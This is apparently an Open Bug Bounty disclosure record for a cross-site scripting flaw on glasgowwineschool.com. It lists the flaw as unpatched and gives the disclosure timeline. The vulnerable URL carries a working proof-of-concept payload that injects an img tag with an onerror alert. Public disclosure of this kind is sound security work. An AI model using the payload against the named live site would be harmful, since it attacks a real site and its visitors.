Lucene search

K
openbugbountyKeritzyOBB:322525
HistoryOct 04, 2017 - 9:58 a.m.

glasgowwineschool.com XSS vulnerability

2017-10-0409:58:00
keritzy
www.openbugbounty.org
6
Vulnerable URL:
http://www.glasgowwineschool.com/calendar_events.php/'%22--!%3E%20%3Cimg%20src=x%20onerror=alert(%22openbugbounty%22)%3E?eventdate=28-09-2017&date;=09-2017
Details:
Description Value
Patched: No
Latest check for patch: 02.01.2018
Vulnerability type: XSS
Vulnerability status: Publicly disclosed
Alexa Rank 8559194
VIP website status: No
Coordinated Disclosure Timeline:
Description Value
Vulnerability submitted via Open Bug Bounty 4 October, 2017 09:58 GMT
Generic security notifications sent to website owner 4 October, 2017 10:18 GMT
Notification sent to subscribers (without technical details) 4 October, 2017 14:17 GMT
Vulnerability details disclosed by researcher 2 January, 2018 10:43 GMT